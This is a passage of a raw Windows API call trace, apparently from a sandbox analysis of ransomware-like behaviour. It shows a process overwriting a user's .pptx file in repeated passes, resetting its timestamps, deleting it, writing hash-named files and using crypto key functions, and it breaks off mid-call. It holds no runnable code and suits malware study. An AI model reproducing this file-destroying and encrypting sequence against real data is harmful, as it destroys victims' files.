hFile=0x36c, lpBuffer=0x2226bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2226bb0*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0076.147] CloseHandle (hObject=0x36c) returned 1 [0076.149] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E.info", lpFilePart=0x0) returned 0x56 [0076.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0076.149] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\b04b5fa7a8b34412fc4fbd3a1815f30e.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.156] GetFileType (hFile=0x36c) returned 0x1 [0076.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0076.157] GetFileType (hFile=0x36c) returned 0x1 [0076.157] WriteFile (in: hFile=0x36c, lpBuffer=0x2234a68*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2234a68*, lpNumberOfBytesWritten=0x1bf5ceb8*=0x77d, lpOverlapped=0x0) returned 1 [0076.158] CloseHandle (hObject=0x36c) returned 1 [0076.158] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", lpFilePart=0x0) returned 0x4a [0076.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0076.158] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\a5ox7vcf1xlwkguwyerc.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d6b8270, ftCreationTime.dwHighDateTime=0x1d4c73f, ftLastAccessTime.dwLowDateTime=0xff905ca0, ftLastAccessTime.dwHighDateTime=0x1d4c973, ftLastWriteTime.dwLowDateTime=0xff905ca0, ftLastWriteTime.dwHighDateTime=0x1d4c973, nFileSizeHigh=0x0, nFileSizeLow=0xba10)) returned 1 [0076.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0076.159] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", lpFilePart=0x0) returned 0x4a [0076.159] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", dwFileAttributes=0x80) returned 1 [0076.159] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", lpFilePart=0x0) returned 0x4a [0076.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0076.159] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\a5ox7vcf1xlwkguwyerc.pptx"), fInfoLevelId=0x0, lpFileInformation=0x223c6a0 | out: lpFileInformation=0x223c6a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x3d6b8270, ftCreationTime.dwHighDateTime=0x1d4c73f, ftLastAccessTime.dwLowDateTime=0xff905ca0, ftLastAccessTime.dwHighDateTime=0x1d4c973, ftLastWriteTime.dwLowDateTime=0xff905ca0, ftLastWriteTime.dwHighDateTime=0x1d4c973, nFileSizeHigh=0x0, nFileSizeLow=0xba10)) returned 1 [0076.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0076.159] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", lpFilePart=0x0) returned 0x4a [0076.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0076.159] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\a5ox7vcf1xlwkguwyerc.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.160] GetFileType (hFile=0x36c) returned 0x1 [0076.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0076.160] GetFileType (hFile=0x36c) returned 0x1 [0076.160] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.160] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.161] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.162] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.163] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.164] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.164] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.165] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.166] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.166] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.167] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.168] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.169] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1a8*=0xc00, lpOverlapped=0x0) returned 1 [0076.169] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.169] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.170] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.171] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.172] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.172] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.173] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.174] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.181] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.181] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.182] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.183] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.183] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1a8*=0xc00, lpOverlapped=0x0) returned 1 [0076.183] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.184] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.185] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.186] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.186] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.187] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.188] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.189] WriteFile (in: hFile=0x36c, lpBuffer=0x223cba8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223cba8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.190] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.190] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.190] SetEndOfFile (hFile=0x36c) returned 1 [0076.191] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.191] CloseHandle (hObject=0x36c) returned 1 [0076.192] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", lpFilePart=0x0) returned 0x4a [0076.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.192] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\a5ox7vcf1xlwkguwyerc.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.192] GetFileType (hFile=0x36c) returned 0x1 [0076.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.192] GetFileType (hFile=0x36c) returned 0x1 [0076.192] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.192] CloseHandle (hObject=0x36c) returned 1 [0076.192] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", lpFilePart=0x0) returned 0x4a [0076.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.192] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\a5ox7vcf1xlwkguwyerc.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.192] GetFileType (hFile=0x36c) returned 0x1 [0076.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.192] GetFileType (hFile=0x36c) returned 0x1 [0076.192] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 1 [0076.192] CloseHandle (hObject=0x36c) returned 1 [0076.193] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", lpFilePart=0x0) returned 0x4a [0076.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.193] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\a5ox7vcf1xlwkguwyerc.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.193] GetFileType (hFile=0x36c) returned 0x1 [0076.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.193] GetFileType (hFile=0x36c) returned 0x1 [0076.193] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0076.193] CloseHandle (hObject=0x36c) returned 1 [0076.193] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", lpFilePart=0x0) returned 0x4a [0076.193] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\a5ox7vcf1xlwkguwyerc.pptx")) returned 1 [0076.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", lpFilePart=0x0) returned 0x4a [0076.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E", lpFilePart=0x0) returned 0x51 [0076.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.194] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\b04b5fa7a8b34412fc4fbd3a1815f30e"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.194] GetFileType (hFile=0x36c) returned 0x1 [0076.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.194] GetFileType (hFile=0x36c) returned 0x1 [0076.194] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.194] CloseHandle (hObject=0x36c) returned 1 [0076.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E", lpFilePart=0x0) returned 0x51 [0076.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\b04b5fa7a8b34412fc4fbd3a1815f30e"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.195] GetFileType (hFile=0x36c) returned 0x1 [0076.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.195] GetFileType (hFile=0x36c) returned 0x1 [0076.195] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0076.195] CloseHandle (hObject=0x36c) returned 1 [0076.195] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E", lpFilePart=0x0) returned 0x51 [0076.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\b04b5fa7a8b34412fc4fbd3a1815f30e"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.195] GetFileType (hFile=0x36c) returned 0x1 [0076.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.195] GetFileType (hFile=0x36c) returned 0x1 [0076.195] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0076.195] CloseHandle (hObject=0x36c) returned 1 [0076.195] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", lpFilePart=0x0) returned 0x45 [0076.196] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", lpFilePart=0x0) returned 0x45 [0076.197] CryptImportKey (in: hProv=0x1a5b8010, pbData=0x2242620, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a626e50) returned 1 [0076.197] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.197] CryptExportKey (in: hKey=0x1a626e50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.197] CryptExportKey (in: hKey=0x1a626e50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2242710, pdwDataLen=0x1bf5d230 | out: pbData=0x2242710*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.197] 